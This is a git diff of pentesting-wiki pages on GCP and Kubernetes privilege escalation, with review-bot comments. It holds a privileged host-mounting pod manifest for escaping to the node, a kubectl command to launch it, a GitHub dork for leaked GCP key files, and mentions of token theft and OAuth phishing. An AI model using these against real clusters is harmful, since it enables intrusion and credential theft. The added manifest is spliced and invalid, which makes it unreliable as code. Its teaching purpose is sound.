diff --git a/cloud-security/gcp-security/README.md b/cloud-security/gcp-security/README.md index 9b0c8a2a..679fb616 100644 --- a/cloud-security/gcp-security/README.md +++ b/cloud-security/gcp-security/README.md @@ -259,14 +259,6 @@ We've automated this completely using [this python script](https://gitlab.com/gi [gcp-buckets-brute-force-and-privilege-escalation.md](gcp-buckets-brute-force-and-privilege-escalation.md) {% endcontent-ref %} -#### Phishing - -You could **OAuth phish** a user with high privileges. - -#### Dorks - -* **Github**: auth\_provider\_x509\_cert\_url extension:json - ## Generic GCP Security Checklists * [Google Cloud Computing Platform CIS Benchmark](https://www.cisecurity.org/cis-benchmarks/) diff --git a/pentesting/pentesting-kubernetes/hardening-roles-clusterroles/README.md b/pentesting/pentesting-kubernetes/hardening-roles-clusterroles/README.md index 015f5516..6ee3c779 100644 --- a/pentesting/pentesting-kubernetes/hardening-roles-clusterroles/README.md +++ b/pentesting/pentesting-kubernetes/hardening-roles-clusterroles/README.md @@ -40,7 +40,7 @@ rules: verbs: ["create", "list", "get"] ``` -### Pod Creation - Steal Token +### Pod Create - Steal Token An attacker with permission to create a pod in the “kube-system” namespace can create cryptomining containers for example. Moreover, if there is a **service account with privileged permissions, by running a pod with that service the permissions can be abused to escalate privileges**. 
@@ -77,11 +77,16 @@ So just create the malicious pod and expect the secrets in port 6666: ![](<../../../.gitbook/assets/image (464).png>) -### **Pod Creation & Escape - Mount Root** +### **Pod Create & Escape** -Having Pod create permissions over kube-system you can also be able to mount directories from the node hosting the pods with a pod template like the following one: +The following definition gives all the privileges a container can have: -{% code title="mount_root.yaml" %} +* **Privileged access** (disabling protections and setting capabilities) +* **Disable namespaces hostIPC and hostPid** that can help to escalate privileges +* **Disable hostNetwork** namespace, giving access to steal nodes cloud privileges and better access to networks +* **Mount hosts / inside the container** + +{% code title="super_privs.yaml" %} ```yaml apiVersion: v1 kind: Pod 
@@ -96,7 +101,32 @@ spec: volumeMounts: - mountPath: /mnt name: volume - volumes: + volumes:apiVersion: v1 +kind: Pod +metadata: + name: ubuntu + labels: + app: ubuntu +spec: + # Uncomment and specify a specific node you want to debug + # nodeName: + containers: + - image: ubuntu + command: + - "sleep" + - "3600" # adjust this as needed -- use only as long as you need + imagePullPolicy: IfNotPresent + name: ubuntu + securityContext: + allowPrivilegeEscalation: true + privileged: true + #capabilities: + # add: ["NET_ADMIN", "SYS_ADMIN"] # add the capabilities you need https://man7.org/linux/man-pages/man7/capabilities.7.html + runAsUser: 0 # run as root (or any other user) + restartPolicy: Never # we want to be intentional about running this pod + hostIPC: true # Use the host's ipc namespace https://www.man7.org/linux/man-pages/man7/ipc_namespaces.7.html + hostNetwork: true # Use the host's network namespace https://www.man7.org/linux/man-pages/man7/network_namespaces.7.html + hostPID: true # Use the host's pid namespace https://man7.org/linux/man-pages/man7/pid_namespaces.7.htmlpe_ - name: volume hostPath: path: / @@ -109,60 +139,23 @@ Create the pod with: kubectl --token $token create -f mount_root.yaml ``` -And capturing the reverse shell you can find the `/` directory (the entire filesystem) of the node mounted in `/mnt` inside the pod. - -**Instead of getting a reverse shell you might just wanto to execute a pod using kubectl with the filesystem mounted and get a shell on it:** - -1. Create a "hostpath volume mount" `pod` manifest. - - ``` - cat > hostpath.yml <
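Review bot: the first hunk (cloud-security/gcp-security/README.md, `@@ -259,14 +259,6 @@`) deletes the "Phishing" and "Dorks" subsections outright, dropping the OAuth-phishing reminder and the `auth\_provider\_x509\_cert\_url extension:json` GitHub dork with no replacement or pointer to where they now live. If this content was moved to another page, add a `{% content-ref %}` link in its place; if it was dropped deliberately, say so in the commit message, because the dork is a standalone technique that readers of the enumeration section will otherwise lose.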
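Review bot: the heading rename in `@@ -40,7 +40,7 @@` ("Pod Creation - Steal Token" to "Pod Create - Steal Token") changes the generated anchor, so any in-page or cross-page links to the old `#pod-creation-steal-token` anchor will break; either keep the original wording, which is also the grammatical form, or check and update every link to this section in the same change.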
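Review bot: in `@@ -77,11 +77,16 @@` the new bullets describe the settings incorrectly: `hostIPC: true`, `hostPID: true` and `hostNetwork: true` do not "disable" namespaces, they make the pod share the node's IPC, PID and network namespaces, which is what enables the escalation; reword to "Share the host's IPC and PID namespaces" and "Share the host's network namespace", and spell the field `hostPID` to match the manifest. The `{% code title="super_privs.yaml" %}` rename also leaves the unchanged `kubectl --token $token create -f mount_root.yaml` in the later context out of sync; rename the file in that command too.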
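Review bot: the hunk `@@ -96,7 +101,32 @@` produces invalid YAML and must not merge as is: a complete second Pod manifest has been pasted into the middle of the `volumes:` key (`+ volumes:apiVersion: v1`, followed by `+kind: Pod`, a second `metadata:`/`spec:`, and the original `- name: volume` / `hostPath:` / `path: /` left dangling after it), and the last added line ends in paste residue (`pid_namespaces.7.htmlpe_`). Rewrite this as one manifest: keep the single `spec:` with `securityContext: {privileged: true, allowPrivilegeEscalation: true, runAsUser: 0}`, `hostIPC: true`, `hostNetwork: true`, `hostPID: true`, the existing `volumeMounts`, and a `volumes:` list containing only the `hostPath: {path: /}` entry, and verify it with `kubectl apply --dry-run=client -f super_privs.yaml` before committing.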
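Review bot: `@@ -109,60 +139,23 @@` removes the only sentence telling the reader that the node's `/` ends up mounted at `/mnt` inside the pod, so the `mountPath: /mnt` in the manifest is left unexplained; keep at least "the `/` directory of the node is mounted in `/mnt` inside the pod" (with the original "wanto" typo fixed to "want to" if the second paragraph is kept). The hunk header reports 60 lines removed against 23 added, but the diff shown here is cut off at `cat > hostpath.yml <`, so the remainder of the removal, including whether the kubectl-exec alternative survives anywhere, cannot be reviewed from this page.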